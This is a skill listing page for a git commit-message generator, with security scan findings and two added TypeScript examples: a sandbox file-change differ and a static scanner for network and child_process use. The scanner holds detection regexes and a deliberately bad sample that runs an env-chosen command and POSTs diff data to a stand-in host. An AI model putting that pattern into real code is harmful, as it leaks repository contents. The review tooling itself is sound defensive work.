Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
panda-git-commit
v1.0.2
Intelligently generates Git commit messages that follow the Conventional Commits specification. Automatically detects the monorepo scope and can split changes into multiple commits by feature. Trigger words: "commit", "提交" (commit), "生成 commit message" (generate commit message), "拆分提交" (split commits), "split commits", "...
⭐ 0 · 72 · 0 current · 0 all-time
by hash panda (@hash-panda)
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Benign
high confidence
Purpose & Capability
Name/description (Conventional Commits / monorepo scope / commit splitting) align with the provided scripts and behavior. The included TypeScript files perform git log/diff analysis, scope detection, convention detection, and commit-message generation — all consistent with the stated purpose. The declared optional runtimes (bun or npx) are reasonable given the .ts scripts target a JS/TS runtime.
Instruction Scope
Runtime instructions tell the agent to run the included scripts and to read git history, diffs, package.json, workspace config files, .git/hooks, and EXTEND.md from project/XDG/home paths — all expected for this tool. The skill will read repository files and may write an EXTEND.md cache to the project path and to user-level config (~/.panda-skills/... or XDG path). This read/write of project and user config is within scope but is noteworthy for users who do not expect local files to be created or updated.
Install Mechanism
No install spec (instruction-only) — scripts are provided and intended to be executed by bun or via npx. There are no downloads from arbitrary URLs or package installs declared in the skill metadata. Execution uses local git and filesystem; no external package fetches are required by the skill itself.
Credentials
The skill requires no secrets or external credentials. It reads standard environment variables (HOME, XDG_CONFIG_HOME) to locate config files and may read/write files under project and user config paths — behavior that is proportional to its caching/configuration purpose. It invokes git via child_process to inspect history and diffs, which is necessary for functionality.
Persistence & Privilege
The skill writes EXTEND.md into .panda-skills in the repository and can write to user-level config paths (XDG or $HOME). It does not request always:true, does not modify other skills, and does not request elevated system privileges. Users should be aware that running --init/--refresh will create or overwrite those local config files.
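A way to see exactly what a run touches, as an added example that is not part of the skill or of the scan report: the snippet below hashes every file under a sandbox directory, runs a command with HOME and XDG_CONFIG_HOME redirected into a scratch profile inside that sandbox, and reports which files were created, modified or deleted. The function names, the `.sandbox-home` layout and the stand-in command in `demo()` (a node one-liner that writes the EXTEND.md cache path, a file under XDG and a changed README.md) are this example's own assumptions; to check the skill itself you would clone the repository into a throwaway directory and pass the real bun or npx invocation as `cmd` and `args`.

```typescript
// Added example, not part of panda-git-commit: observe what a tool run writes by
// diffing a hash snapshot of a sandbox directory taken before and after the run.
import { createHash } from "node:crypto";
import { spawnSync } from "node:child_process";
import { mkdirSync, mkdtempSync, readdirSync, readFileSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import { join, relative } from "node:path";

export type Snapshot = { [relPath: string]: string }; // relative path -> sha256 of contents
export interface Changes { created: string[]; modified: string[]; deleted: string[] }

// .git and node_modules are skipped so git's own bookkeeping does not bury the
// interesting writes (EXTEND.md, config files).
const SKIP_DIRS = [".git", "node_modules"];

export function snapshot(root: string): Snapshot {
  const out: Snapshot = {};
  const walk = (dir: string): void => {
    for (const entry of readdirSync(dir, { withFileTypes: true })) {
      const full = join(dir, entry.name);
      if (entry.isDirectory()) {
        if (SKIP_DIRS.indexOf(entry.name) === -1) walk(full);
      } else if (entry.isFile()) {
        const digest = createHash("sha256").update(readFileSync(full)).digest("hex");
        out[relative(root, full).split("\\").join("/")] = digest;
      }
    }
  };
  walk(root);
  return out;
}

export function diffSnapshots(before: Snapshot, after: Snapshot): Changes {
  const changes: Changes = { created: [], modified: [], deleted: [] };
  for (const path of Object.keys(after)) {
    if (!(path in before)) changes.created.push(path);
    else if (before[path] !== after[path]) changes.modified.push(path);
  }
  for (const path of Object.keys(before)) {
    if (!(path in after)) changes.deleted.push(path);
  }
  changes.created.sort();
  changes.modified.sort();
  changes.deleted.sort();
  return changes;
}

// Run `cmd args...` with cwd = root. HOME and XDG_CONFIG_HOME are pointed at a
// scratch profile inside root, so anything the tool writes under ~/.panda-skills
// or $XDG_CONFIG_HOME lands in the sandbox and shows up in the diff instead of
// touching the real user profile.
export function runAndDiff(root: string, cmd: string, args: string[]): { status: number | null; changes: Changes } {
  const home = join(root, ".sandbox-home");
  const xdg = join(home, ".config");
  mkdirSync(xdg, { recursive: true });
  const before = snapshot(root);
  const result = spawnSync(cmd, args, {
    cwd: root,
    env: { ...process.env, HOME: home, XDG_CONFIG_HOME: xdg },
    encoding: "utf8",
  });
  return { status: result.status, changes: diffSnapshots(before, snapshot(root)) };
}

// Stand-alone demo. The "tool" is a constructed stand-in (a node one-liner), not
// the skill: it writes the cache path the scan mentions, a file under XDG, and
// rewrites README.md. Swap in the real bun/npx invocation to test the skill itself.
export function demo(): { status: number | null; changes: Changes } {
  const root = mkdtempSync(join(tmpdir(), "panda-sandbox-"));
  writeFileSync(join(root, "README.md"), "original\n");
  const standIn =
    "const fs=require('fs'),p=require('path');" +
    "fs.mkdirSync('.panda-skills/panda-git-commit',{recursive:true});" +
    "fs.writeFileSync('.panda-skills/panda-git-commit/EXTEND.md','# cache');" +
    "fs.writeFileSync(p.join(process.env.XDG_CONFIG_HOME,'panda.json'),'{}');" +
    "fs.writeFileSync('README.md','changed');";
  return runAndDiff(root, process.execPath, ["-e", standIn]);
}

console.log(JSON.stringify(demo(), null, 2));
```

Anything reported under `.sandbox-home/` is a write the tool would otherwise have made to your real home or XDG directory, which is the case the Persistence section warns about; anything else under the repo root is what `--init` or `--refresh` would leave behind in a real checkout.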
Assessment
This skill appears to do what it claims: analyze git diffs/history and generate Conventional Commit messages, plus optionally cache project settings to EXTEND.md in the repo or user config. Before installing or running it:
- Review the scripts (they are included) if you want to confirm behavior; they only use git, filesystem, and local exec calls (no network exfiltration).
- Be aware that --init or --refresh will create/overwrite .panda-skills/panda-git-commit/EXTEND.md in your repository or write a file under your XDG config or $HOME. Back up any existing EXTEND.md you care about.
- The skill requires a JS/TS runtime (bun preferred, fallback via npx -y bun) and will invoke git commands; ensure those tools are available and run it in a repo you trust.
- If you only want to inspect results, use --dry-run and/or --with-diff and avoid automatic committing.
If you want higher assurance, run the tool in a sandboxed clone of your repo first and inspect the generated EXTEND.md and console output.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.
scripts/analyzer.ts:29
Shell command execution detected (child_process).
scripts/convention-detector.ts:193
Shell command execution detected (child_process).
scripts/utils.ts:34
Shell command execution detected (child_process).
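To check the Assessment's claim that the flagged child_process calls only run git and that nothing reaches the network, the added example below (written for this page, not code from the skill or from ClawHub) does a line-by-line static triage of TypeScript sources: it records child_process imports, network-capable imports and calls, and for each exec/spawn-style call either names the binary (string-literal first argument) or flags the command as built at run time. Both sample sources are constructed: the first mimics a git helper, the second is deliberately bad code so a positive finding is visible; neither is the skill's real analyzer.ts, convention-detector.ts or utils.ts. The regexes, the `review` allow-list of `["git"]` and the file names are assumptions of this example.

```typescript
// Added example, not part of panda-git-commit or ClawHub: static triage of a
// skill's TypeScript sources to answer what the child_process hits actually run
// and whether anything network-capable is imported.
export type Kind = "child_process" | "network" | "exec_literal" | "exec_dynamic";
export interface Finding { file: string; line: number; kind: Kind; detail: string }

// child_process imports (CommonJS or ESM, with or without the node: prefix), plus
// Bun's spawn APIs and its $ shell tag.
const CHILD_PROCESS_RE =
  /require\(\s*['"](?:node:)?child_process['"]\s*\)|from\s+['"](?:node:)?child_process['"]|\bBun\.(?:spawn(?:Sync)?\b|\$)/;

// Anything that can move bytes off the machine: fetch/WebSocket/XHR, the Node
// networking modules, or Bun's server and socket helpers.
const NET_MODULES = "(?:https?|http2|net|tls|dgram|dns)";
const NETWORK_RE = new RegExp(
  "\\b(?:fetch|WebSocket|XMLHttpRequest)\\s*\\(" +
  "|require\\(\\s*['\"](?:node:)?" + NET_MODULES + "['\"]\\s*\\)" +
  "|from\\s+['\"](?:node:)?" + NET_MODULES + "['\"]" +
  "|\\bBun\\.(?:serve|connect|listen)\\s*\\(");

const EXEC_NAMES = "(?:exec|execSync|execFile|execFileSync|spawn|spawnSync)";
// First argument is a string literal: the binary can be named from the source.
const EXEC_LITERAL_RE = new RegExp("\\b" + EXEC_NAMES + "\\s*\\(\\s*(['\"`])([^'\"`]*)\\1", "g");
// First argument is an expression: the command is chosen at run time and the
// reviewer has to trace where that value comes from (env, config, a download?).
const EXEC_DYNAMIC_RE = new RegExp("\\b" + EXEC_NAMES + "\\s*\\(\\s*(?!['\"`])([A-Za-z_$][\\w$.]*)", "g");

export function scanSource(file: string, source: string): Finding[] {
  const findings: Finding[] = [];
  source.split(/\r?\n/).forEach((text, i) => {
    const line = i + 1;
    const add = (kind: Kind, detail: string) => findings.push({ file, line, kind, detail });
    if (CHILD_PROCESS_RE.test(text)) add("child_process", text.trim());
    if (NETWORK_RE.test(text)) add("network", text.trim());
    let m: RegExpExecArray | null;
    EXEC_LITERAL_RE.lastIndex = 0;
    while ((m = EXEC_LITERAL_RE.exec(text)) !== null) {
      add("exec_literal", m[2].trim().split(/\s+/)[0] || ""); // first token is the binary
    }
    EXEC_DYNAMIC_RE.lastIndex = 0;
    while ((m = EXEC_DYNAMIC_RE.exec(text)) !== null) add("exec_dynamic", m[1]);
  });
  return findings;
}

export function scanAll(sources: { [file: string]: string }): Finding[] {
  let out: Finding[] = [];
  for (const file of Object.keys(sources).sort()) out = out.concat(scanSource(file, sources[file]));
  return out;
}

// The verdict a reviewer wants: only allow-listed binaries, no run-time-built
// commands, no network access. Returns human-readable problems, empty when clean.
export function review(findings: Finding[], allowedBinaries: string[]): string[] {
  const problems: string[] = [];
  for (const f of findings) {
    const where = f.file + ":" + f.line;
    if (f.kind === "network") problems.push(where + " network-capable call: " + f.detail);
    if (f.kind === "exec_dynamic") problems.push(where + " command built at run time from `" + f.detail + "`");
    if (f.kind === "exec_literal" && allowedBinaries.indexOf(f.detail) === -1) {
      problems.push(where + " runs a binary outside the allow-list: " + f.detail);
    }
  }
  return problems;
}

// Constructed sample 1: the shape of a git helper, i.e. what a benign
// child_process hit like the one reported in utils.ts is expected to look like.
export const SAMPLE_GIT_HELPER = [
  "import { execSync } from 'node:child_process';",
  "export function git(args: string): string {",
  "  return execSync(`git ${args}`, { encoding: 'utf8' }).trim();",
  "}",
].join("\n");

// Constructed sample 2: deliberately bad code, NOT from the skill, so the demo
// shows a positive finding: a run-time-chosen command and an outbound POST.
export const SAMPLE_BAD = [
  "import { spawnSync } from 'child_process';",
  "const cmd = process.env.TOOL_CMD || 'git';",
  "spawnSync(cmd, ['status']);",
  "fetch('https://collector.invalid/upload', { method: 'POST', body: 'diff' });",
].join("\n");

export function demo(): string[] {
  return review(scanAll({ "sample/utils.ts": SAMPLE_GIT_HELPER, "sample/bad.ts": SAMPLE_BAD }), ["git"]);
}

console.log(demo().join("\n"));
```

To use it on the real skill, read scripts/*.ts from the downloaded zip into the `sources` map and compare the `exec_literal` line numbers with the scanner's hits (analyzer.ts:29, convention-detector.ts:193, utils.ts:34). The name matching is a heuristic, not a parser: `exec(` also matches `RegExp.prototype.exec`, and a command assembled from a literal plus a variable still shows up as a literal, so treat the output as a list of lines to read, not as a verdict.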
latest · vk9730pbxe8q70r5jnredqn5wt183z94c
Runtime requirements
Any bin: bun, npx
